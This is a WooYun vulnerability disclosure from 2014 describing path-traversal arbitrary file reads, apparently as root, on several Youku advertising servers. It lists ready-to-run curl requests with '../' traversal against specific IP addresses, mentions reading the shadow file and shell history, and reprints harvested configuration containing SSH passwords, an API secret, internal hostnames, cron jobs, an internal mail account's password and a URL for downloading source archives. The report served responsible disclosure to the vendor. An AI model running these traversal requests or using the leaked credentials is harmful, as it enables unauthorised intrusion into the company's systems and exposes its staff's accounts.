乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-01: 细节已通知厂商并且等待厂商处理中 2014-12-01: 厂商已经确认,细节仅向厂商公开 2014-12-11: 细节向核心白帽子及相关领域专家公开 2014-12-21: 细节向普通白帽子公开 2014-12-31: 细节向实习白帽子公开 2015-01-15: 细节向公众公开
优酷系列服务器文件读取以及内部信息泄露
广告系统的几台服务器都有问题。可以读取任意文件 并且是root权限。
下面是收集到的有问题的几台服务器。
curl http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
以其中一台为例进行延伸。读取shadow
读取history
通过history读取各种配置文件
# -*- coding: utf-8 -*-[auctionserver_default]# 安装根目录rundir = /opt/workspace/exchange1.2/auctionserver#模式(prod/dev)mode = "prod"#接受请求verticle个数mainCore = 8#与dsp连接的verticle个数beaconCore = 8# 拍卖服务器的域名,用于进行HTTP请求时对Host的验证serverHosts = ["c.miaozhen.atm.youku.com","b.miaozhen.atm.youku.com"]# 拍卖服务器的端口port = 80# 对Exchange网站开放的API的端口apiPort = 8080# 默认的曝光监控地址impAddr = "http://n.miaozhen.atm.youku.com/x.gif"# 默认的点击监控地址clickAddr = "http://n.miaozhen.atm.youku.com/r.gif"# user id在cookie里面的keymzCookieName = "__ysuid"# 对DSP的连接池大小,由于多个beacon,其实是乘以beacon个数的clientPoolSize = 100# HTTP pipeline队列的最大长度clientMaxPipelineSize = 200 clientConnectionTimeout = 300serverIdleTimeout = 700# 是否需要服务费needServiceFee = "false"# 特殊请求密码secret = "miaozhen1234"isNoticeInPm = "true"# 是否检查domain,优先于网站中的配置isCheckDomain = "true"isCheckHost = "false"isCheckToken = "false"token = "testToken"#优酷的特殊功能开关isYouku = "true"useIPsClient = "true"#dmpisDMP = "false"dmpHost = "127.0.0.1"dmpPort = 6379dmpKey = "YK_"dmpSep = ","# Exchange网站的地址websiteHost = "miaozhen.atm.youku.com"websitePort = 80websiteIps = ["220.181.154.177", "123.126.99.87", "10.103.255.174"]websiteHeaderHost = "miaozhen.atm.youku.com"# 注册接口,不需要修改registerApi = "/server/api/addAuction"# 预算请求接口,不需要修改budgetApi = "/pull/api/budget/take"# 拍卖日志输出的Redis的地址,默认本地redisHost = "127.0.0.1"redisPort = 6379keyBudget = "exchange_auction_budget_backup"# 输出日志的根目录auctionDataDir = "/opt/data/backup/exchange1.2/auctionserver"# 是否显示系统日志isShowLog = "true"# 保留日志天数logReservedDays = 30mappingRMUrl = ""budgetPort=8281budgetHost="miaozhen.atm.youku.com"mappingDmpPort=6380mappingDmpHost=""mappingDspQps=1mappingDspUrl=""mappingDspId=""forwardPath = "/"forwardPort = 1234forwardHost = "127.0.0.1"isForward = "false"heapSize = 10#启动和停止相关脚本start = bash bin/start.shstop = bash bin/stop.shcheck = bash bin/check.shrestart = bash bin/restart.shstart_retry = bash bin/start_retry.shstop_retry = bash bin/stop_retry.shbackup = bash bin/backup.sh#安装的目标机器密码#sshpass = "123456"#安装的目标机器端口sshport = "1111"[auctionserver_01]#安装的目标机器用户和域名(ip)node = [email protected]sshpass = "ocf(*XzhWt4K"# 拍卖服务器的名字serverName = "a05.exchange.ad.b28.youku"[auctionserver_02]#安装的目标机器用户和域名(ip)node = [email protected]sshpass = "isC*&7cjpZCW"# 拍卖服务器的名字serverName = "a06.exchange.ad.b28.youku"#[auctionserver_03]##安装的目标机器用户和域名(ip)#node = [email protected]#sshpass = "wzxJ^#jsQJKv"## 拍卖服务器的名字#serverName = "a08.exchange.ad.b28.youku"
列出几个关键文件地址,不截图证明。
/opt/workspace/exchange1.2/reportserver/run/start.sh/opt/workspace/exchange1.2/reportserver/code/CMakeLists.txt /opt/workspace/exchange1.2/reportserver/config/mergelog.list/opt/workspace/exchange1.2/reportserver/config/reportserver.cfg/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_new_config.ini/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_config.ini/opt/workspace/exchange1.2/auctionserver/conf/dsps.txt /home/zczhao/warn/sendlog.perl/opt/workspace/exchange1.2/thirdparts/redis-2.4.17/redis.conf/home/zczhao/cron/reporttab0 2 * * * /home/zczhao/clear/clear_log.sh0 2 * * * /home/zczhao/clear/clear_bz2.sh0 2 * * * /home/zczhao/clear/bz2_day.sh >> /home/zczhao/clear/history.log#*/10 * * * * /home/zczhao/warn/disk_warn.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/run_dnscache.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/heartbeat_check.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/jmap.sh/opt/data/backup/exchange1.2/reportserver/auction/log/bz2.sh
其中sendlog.perl中有一个内部邮箱账号
my $mail_smtp = 'mail.youku.com';my $mail_from = '[email protected]';my $mail_to = '[email protected]';my $auth_id = 'systeminformation';my $auth_passwd = '111aaaAAA';my $subject = "Warn from adExchange13 ($date).";my $body = `cat /home/zczhao/warn/warn_log`;
对了,还可以下载源码。http://220.181.185.228/../../../../../../../../opt/workspace/exchange1.2/auctionserver.2014-07-16-07-52-30.tar.gz
危害等级:高
漏洞Rank:20
确认时间:2014-12-01 16:14
多谢提醒,马上修复。
暂无